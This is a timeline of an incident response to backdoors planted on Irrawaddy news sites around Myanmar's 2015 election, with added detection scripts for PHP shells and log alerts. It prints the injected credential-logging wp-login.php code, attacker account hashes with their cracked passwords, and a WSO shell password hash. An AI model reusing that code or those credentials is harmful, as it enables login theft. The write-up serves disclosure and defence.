Fighting Cyber Attacks during the Burmese Elections

7th Nov 22:30 PM – Critical backdoor discovered

A critical backdoor is found that captures the passwords of every user of the site, administrators included. The site's wp-login.php has been modified so that each submitted username and password is appended to a log file:

/** Make sure that the WordPress bootstrap has run before continuing. */
// Injected code: every login attempt is appended to a file inside the web root
if(isset($_POST['log']) && $_POST['log'] !=''){
$fp = fopen('/home/burmairrawaddy/public_html/wp-admin/user/log.txt', 'a');
fwrite($fp, $_POST['log'] . ': ');   // submitted username
fwrite($fp, $_POST['pwd'] . "\n");   // submitted password, in clear text
fclose($fp);
}

7th Nov 21:40 PM – All passwords are reset

As an emergency response to the situation, we decide to reset all passwords of the sites.

8th Nov 1:20 AM – WordPress Admin access has two unexpected accounts

Two new accounts are discovered in the .htaccess file that protects the wp-admin area of the site:

     rcn:L9hHT9CWSvtmk
     smorozik:fkvj/MrPzdK7U

8th Nov 1:50 AM – Brute forcing the attackers’ passwords

We brute-forced the password of the account smorozik (Морозик) that the attacker had placed and found that the password was q1w2e3as.

(Update, 13th November 2015: after a few hours of brute-force password cracking we found that the second password, for rcn, is rcntest1.)

We saw that the last time the attackers downloaded the harvested credentials to gain access to the site was the 6th of November.

203.81.85.66 - - [06/Nov/2015:03:34:32 -0500] "GET /wp-admin/user/log.txt HTTP/1.1" 
203.81.85.66 - smorozik [06/Nov/2015:03:34:34 -0500] "GET /wp-admin/user/log.txt HTTP/1.1" 

8th Nov 2:30 AM – Who is smorozik?

Irrawaddy.org confirms that neither smorozik nor rcn are their accounts.

8th November 1:40 AM – Full list of backdoors

All three news sites (English and two Burmese) have been manually scanned for backdoors. The following 12 backdoors were found:

English news site: www.irrawaddy.org (4 backdoors)

  1. wp-content/uploads/2014/10/.htaccess
  2. wp-login.php (logging all credentials in wp-admin/user/log.txt)
  3. wp-content/plugins/fix-rss-feed/fix-rss-help.php
  4. wp-signin.php

Burmese news site: burma.irrawaddy.org (7 backdoors)

  1. feeds/.htaccess
  2. wp-content/wp-cache-config.php
  3. wp-includes/help.php
  4. wp-login.php (logging all credentials in wp-admin/user/log.txt)
  5. fix.php
  6. phpinfo.php
  7. wp-content/plugins/wp-polls/polls-logs.php

Old Burmese news site: bur.irrawaddy.org (1 backdoor)

  1. backup/noob.php

We neutralize any remaining “backtick backdoors” by disabling PHP functions such as shell_exec and its variants (the backtick operator is disabled together with shell_exec).

8th Nov 2:00 AM – Monitoring new attacks

The log file “log.txt” that was used to harvest WordPress credentials is left on the server to track activity from the attackers. A script is deployed on the server to send alerts whenever the attackers access the files.

8th Nov 4:00 AM – De-obfuscating backdoors

Irrawaddy shares a file (help.php) which they found on their server and suspect contains malicious code. The file starts with a typical obfuscation signature:

$c=strrev("edo"."ced_4"."6e"."sab");

strrev() reverses the concatenated string, so $c ends up holding "base64_decode" without that function name ever appearing literally in the file.

After de-obfuscating help.php we concluded that it was a WSO shell backdoor.
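The strrev trick above and the $auth_pass line quoted further down are easy to scan for. This added example (not code from the original post) resolves strrev() over concatenated literals and lists the shell indicators it finds; the sample PHP is constructed around the two lines quoted on this page.

```python
import re

# strrev("edo"."ced_4"."6e"."sab") style: concatenated literals inside strrev()
STRREV_RE = re.compile(r'strrev\(\s*((?:"[^"]*"\s*\.?\s*)+)\)')
LITERAL_RE = re.compile(r'"([^"]*)"')

# Indicators matching the shells found on the site (WSO, Madspot, backtick shells)
INDICATORS = {
    r'\$auth_pass\s*=\s*"[0-9a-f]{32}"': "WSO shell password (md5 in $auth_pass)",
    r'\beval\s*\(': "eval() of generated code",
    r'\bbase64_decode\s*\(': "base64_decode() call in clear",
    r'`[^`\n]+`': "backtick shell execution",
    r'\b(?:shell_exec|passthru|system|exec)\s*\(': "command execution function",
    r'fsockopen\s*\(\s*["\']udp://': "UDP socket, as used for flooding",
}
# Function names worth flagging when they only appear reversed
HIDDEN_CALLS = {"base64_decode", "gzinflate", "str_rot13", "shell_exec", "system"}

def resolve_strrev(src):
    """Rebuild each strrev("a"."b"...) into the string it evaluates to."""
    return ["".join(LITERAL_RE.findall(m.group(1)))[::-1] for m in STRREV_RE.finditer(src)]

def scan_php(src):
    hits = [desc for pat, desc in INDICATORS.items() if re.search(pat, src)]
    revealed = resolve_strrev(src)
    # a function name hidden behind strrev is itself an indicator
    hits += [f"strrev-obfuscated {name}" for name in revealed if name in HIDDEN_CALLS]
    return {"revealed": revealed, "indicators": hits}

# Constructed sample: the obfuscation line and the $auth_pass value quoted on this page
SAMPLE_PHP = r'''<?php
$c=strrev("edo"."ced_4"."6e"."sab");
$auth_pass = "19c89c73b70e910980c554e98a7092f6";
eval($c($payload));
'''
```

Note that a plain grep for base64_decode misses the sample entirely; only after resolving strrev() does the hidden call show up.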

8th Nov 4:05 AM – noob.php backdoor

A second obfuscated backdoor is identified, and after de-obfuscating it we find the Pakistani Madspot backdoor, a PHP shell with DDoS capabilities. The backdoor can run UDP flooding attacks.

The Pakistani Madspot backdoor with DDoS capabilities.

8th November 4:10 AM – 203.81.85.66 logged activities

We reviewed alerts from other websites we host and verified that the IP 203.81.85.66 had also been blocked in the past on a www.dvb.no site.

On Irrawaddy.org’s websites we could find traces of the attacker going back to early July:

203.81.85.66 - - [06/Jul/2015:00:11:01 -0400] "GET /wp-includes/help.php HTTP/1.1" 404 44343
203.81.85.66 - - [08/Jul/2015:02:48:12 -0400] "GET /wp-content/plugins/akismet/views/help.php HTTP/1.1" 404 57957 
203.81.85.66 - - [08/Jul/2015:02:52:51 -0400] "GET /wp-content/themes/twentyfourteen/help.php HTTP/1.1" 200 8194
203.81.85.66 - - [08/Jul/2015:02:53:00 -0400] "POST /wp-content/themes/twentyfourteen/help.php HTTP/1.1" 200 42528
103.25.12.12 - - [08/Jul/2015:08:55:12 -0400] "GET /wp-content/themes/twentyfourteen/help.php HTTP/1.1" 200 8188
103.25.12.12 - - [08/Jul/2015:08:55:18 -0400] "POST /wp-content/themes/twentyfourteen/help.php HTTP/1.1" 200 9763

The attacker has been logging credentials since July 2015.

203.81.85.66 - - [26/Jul/2015:21:57:23 -0400] "GET /wp-admin/user/log.txt HTTP/1.1"
203.81.85.66 - - [26/Jul/2015:21:58:56 -0400] "GET /wp-admin/user/log.txt HTTP/1.1" 

More traces of the attackers from 2 October 2015:

203.81.85.66 - - [02/Oct/2015:05:33:53 -0400] "GET /wp-includes/help.php HTTP/1.1" 
203.81.85.66 - - [02/Oct/2015:05:35:12 -0400] "POST /wp-includes/help.php HTTP/1.1" 200 8587
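The alerting script mentioned in the monitoring step and the log review above both come down to the same check: parse each access-log line and flag requests for the harvest file or one of the shells. This added example (not the script from the original post) does that over constructed lines modelled on the excerpts on this page, with status and size filled in, and also records the earliest timestamp per source IP to scope how far back the intrusion goes.

```python
import re
from datetime import datetime

# Apache access-log prefix: ip ident user [timestamp] "METHOD path proto" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*"(?: (?P<status>\d{3}) (?P<size>\S+))?')

# Site-relative paths of the harvest file and shells listed above
WATCHED = {
    "/wp-admin/user/log.txt": "harvested credentials read",
    "/wp-includes/help.php": "WSO shell",
    "/backup/noob.php": "Madspot DDoS shell",
}

def parse_line(line):
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return rec

def classify(path):
    # the attacker dropped help.php in several directories, so match the name too
    return WATCHED.get(path) or ("help.php outside the known list" if path.endswith("/help.php") else None)

def scan(lines):
    alerts, first_seen = [], {}
    for rec in filter(None, map(parse_line, lines)):
        if rec["ip"] not in first_seen or rec["ts"] < first_seen[rec["ip"]]:
            first_seen[rec["ip"]] = rec["ts"]
        what = classify(rec["path"])
        if what is None:
            continue
        # 404 = probing for a shell that is not there; POST 200 = shell likely used
        severity = ("probe" if rec["status"] == "404" else
                    "high" if rec["method"] == "POST" and rec["status"] == "200" else "medium")
        alerts.append({"ip": rec["ip"], "ts": rec["ts"], "path": rec["path"],
                       "what": what, "severity": severity})
    return alerts, first_seen

# Constructed sample modelled on the excerpts above (status and size filled in)
SAMPLE_LOG = """\
203.81.85.66 - - [06/Jul/2015:00:11:01 -0400] "GET /wp-includes/help.php HTTP/1.1" 404 44343
203.81.85.66 - - [08/Jul/2015:02:53:00 -0400] "POST /wp-content/themes/twentyfourteen/help.php HTTP/1.1" 200 42528
203.81.85.66 - - [26/Jul/2015:21:57:23 -0400] "GET /wp-admin/user/log.txt HTTP/1.1" 200 1532
198.51.100.7 - - [06/Nov/2015:03:00:00 -0500] "GET /index.php HTTP/1.1" 200 5120
203.81.85.66 - smorozik [06/Nov/2015:03:34:34 -0500] "GET /wp-admin/user/log.txt HTTP/1.1" 200 2048
"""
```

Feeding the live access log through scan() line by line and sending each "high" or "medium" alert is all the monitoring script needs to do.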

help.php contains a WSO shell backdoor protected by the following password (WSO stores the MD5 hash of the password in $auth_pass):

$auth_pass = "19c89c73b70e910980c554e98a7092f6";

9th Nov 9:37 AM – Attackers change IP address

On Monday the 9th of November, the day after the election, there were some topology changes in the military network and the attackers moved from the IP address 203.81.85.66 to 203.81.85.2. The change took place between 9.49 AM and 9.52 AM local Burmese time.

203.81.85.66 - -[09/Nov/2015:09:49:32 +0000] 
"GET /videos/wp-content/uploads/2015/03/xhead.jpg.pagespeed.ic.ugNON5njyY.jpg" "http://tv.dvb.no/videos/%e1%80%9b%e1%80%bd%e1%80%b3%e1%80%b6%e1%80%b8%e1%80%90%e1%80%9a%e1%80%b9-%e1%80%a5%e1%80%ae%e1%80%b8%e1%80%b1%e1%80%8c%e1%80%b8%e1%80%a5%e1%80%ae%e1%80%b8"
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:42.0) Gecko/20100101 Firefox/42.0"
"XBV:3DD8B0CE676F0FB8"
203.81.85.2 - -[09/Nov/2015:09:51:28 +0000]
"GET / HTTP/1.1" 200 
"http://burmese.dvb.no/archives/category/news/international-news/page/2"
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:42.0) Gecko/20100101 Firefox/42.0" 
"XBV:3DD8B0CE676F0FB8" 

The machine with IP address 203.81.85.2 has TCP port 541 open and its traffic signature resembles a Fortinet firewall.

9th Nov 10:00 AM – MPT Network Outage

At 10 AM we spotted a partial loss of incoming traffic in one of our traffic balancers. The outage was taking place in AS9988 Myanma Posts & Telecommunications for a period of 1h; a second, brief outage took place at 12 AM for 20 mins.
We verified that several prefixes of the operator became unreachable, confirming the information with our own probes and RIPE Atlas.

BGP activity in network 203.81.72.0/21